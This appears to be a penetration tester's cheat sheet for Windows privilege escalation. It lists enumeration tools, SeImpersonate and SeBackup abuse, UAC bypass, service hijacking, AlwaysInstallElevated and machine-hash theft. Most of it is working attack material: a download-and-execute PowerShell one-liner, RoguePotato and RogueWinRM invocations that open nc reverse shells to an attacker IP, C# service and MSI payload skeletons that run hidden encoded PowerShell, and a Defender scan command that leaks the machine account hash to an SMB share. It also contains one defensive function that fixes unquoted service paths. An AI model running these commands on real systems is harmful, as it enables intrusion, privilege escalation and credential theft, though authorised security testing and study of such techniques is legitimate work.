Windows

Enumeration

PrivEscCheck

PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
or:
powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object result.txt"

PowerUp

IEX (New-Object Net.WebClient).DownloadString('<url>/PowerUp.ps1'); Invoke-AllChecks

Unquoted Service Paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
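The same misconfiguration from the defender's side, as an added hardening check that is not part of the original notes: the function below lists auto-start services whose unquoted image path contains spaces, shows which bogus paths Windows would try before the real binary, and with -Fix quotes the path in the registry. It assumes an elevated PowerShell session on the audited host; Get-UnquotedServicePath is a name introduced here, not a built-in cmdlet.

```powershell
# Added hardening check, not part of the original notes. Assumes an elevated
# PowerShell session on the host being audited; Get-UnquotedServicePath is a
# name introduced here, not a built-in cmdlet.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        [switch]$Fix   # rewrite ImagePath with the executable part quoted
    )
    $regBase = 'HKLM:\SYSTEM\CurrentControlSet\Services'

    foreach ($svc in (Get-CimInstance Win32_Service | Where-Object StartMode -eq 'Auto')) {
        $path = $svc.PathName
        # Already quoted, or empty (drivers / svchost entries): nothing to do.
        if (-not $path -or $path.StartsWith('"')) { continue }

        # The executable part ends at the first ".exe"; the rest are arguments.
        $m = [regex]::Match($path, '^(?<exe>.*?\.exe)(?<args>.*)$', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups['exe'].Value
        if ($exe -notmatch ' ') { continue }   # no spaces: CreateProcess cannot mis-split it

        # Reconstruct the lookup order CreateProcess uses for an unquoted path:
        # "C:\Program Files\Acme\svc.exe" -> C:\Program.exe, then the real binary.
        $parts = $exe -split ' '
        $lookups = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }

        $finding = [pscustomobject]@{
            Service    = $svc.Name
            RunsAs     = $svc.StartName
            ImagePath  = $path
            TriedFirst = $lookups   # a user-writable parent directory here is the risk
            Fixed      = $false
        }
        if ($Fix) {
            $quoted = '"{0}"{1}' -f $exe, $m.Groups['args'].Value
            Set-ItemProperty -Path (Join-Path $regBase $svc.Name) -Name ImagePath `
                             -Value $quoted -Type ExpandString
            $finding.Fixed = $true
        }
        $finding
    }
}

# Report only; add -Fix to quote the paths in place (takes effect on the next service start).
Get-UnquotedServicePath | Format-List
```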

Common CVEs

CVE-2019-1388: Windows Privilege Escalation Through UAC

Download and start hhupd.exe, get it to launch iexplore.exe from the UAC dialog, then start cmd.exe from the browser's save-file dialog.

Privilege Abuse

If privileges are present but disabled, you can enable them with AdjustTokenPrivileges. All these privileges are configured via "secpol.msc -> Local Policies -> User Rights Assignment".

SeBackupPrivilege/SeRestorePrivilege

These privileges allow unrestricted read/write access to every file on the system. They have to be enabled first, which you can do with the following PowerShell modules:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege <source> <target>

SeImpersonatePrivilege

This privilege allows impersonating the user that connects to you. The connection can happen via HTTP NTLM auth, SMB or named pipes.
This was patched in August 2020 (the spooler won't connect to your named pipe anymore; the underlying technique still works though).
This requires that the victim server can reach your box on port 135. You run the OxidResolver and use socat to forward your port 135 to the OxidResolver's port. Then you can run the exploit:
# on attacker box
socat tcp-listen:135,reuseaddr,fork tcp:<oxidip>:9999
# on target
RoguePotato.exe -r <attackerip> -e "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -l 9999
RogueWinRM is usable if WinRM is not already running (unpatched). Usage (don't quote the path):
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "<ip> <port> -e cmd"

Bypassing UAC

There are lots of different ones out there; a good collection is UACME, but it gets detected very easily. In Covenant you can do:
BypassUACCommand cmd.exe "/c powershell -enc <cmd>"

Service Abuse

Check permissions on a service (PowerShell; Get-ServiceAcl is not a built-in cmdlet and has to be loaded first):
'service name' | Get-ServiceAcl | Select-Object -ExpandProperty Access
For a payload that behaves like a real service, use the following skeleton (create a new C# console application and reference System.ServiceProcess):
using System.Diagnostics;
using System.ServiceProcess;
using System.Threading;

// Goes into a class derived from ServiceBase. The work runs on its own thread so
// OnStart returns promptly and the service control manager reports the service as started.
protected override void OnStart(string[] args)
{
    var si = new ProcessStartInfo
    {
        FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
    };
    var proc = new Process
    {
        StartInfo = si
    };
    var t = new Thread(() =>
    {
        proc.Start();
        proc.WaitForExit();
        proc.Dispose();
    });
    t.Start();
}
Finally, modify and restart the service:
sc config "service name" binPath= "c:\temp\x.exe"
sc qc "service name"
sc stop "service name"
sc start "service name"

Always Install Elevated

Create an MSI installer in Visual Studio. Skeleton:
using System.Diagnostics;

namespace Service
{
    class Program
    {
        static void Main(string[] args)
        {
            var si = new ProcessStartInfo
            {
                FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
            };
            var proc = new Process
            {
                StartInfo = si
            };
            proc.Start();
            proc.WaitForExit();
            proc.Dispose();
        }
    }
}
Set the output type to Windows Application, then add a new project to the solution (of type Setup Wizard). Make sure it includes "primary output from <project>". Modify the settings as you need. To make sure it gets installed, right-click the installer project: View -> Custom Actions. Then add a custom action to Install that contains the primary output from before.
Finally run:
msiexec /i <filename> /qn

Restoring Service Privileges

Stealing Machine Account Hash from a Low Privileged Shell

Via Defender

Run Windows Defender against an SMB share to get the machine account hash:
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\<ip>\public\file'
This hash can be cracked via crack.sh, or, if the target is a DC, we can pass the hash to secretsdump (requires NT hash support (deprecated)).

Tools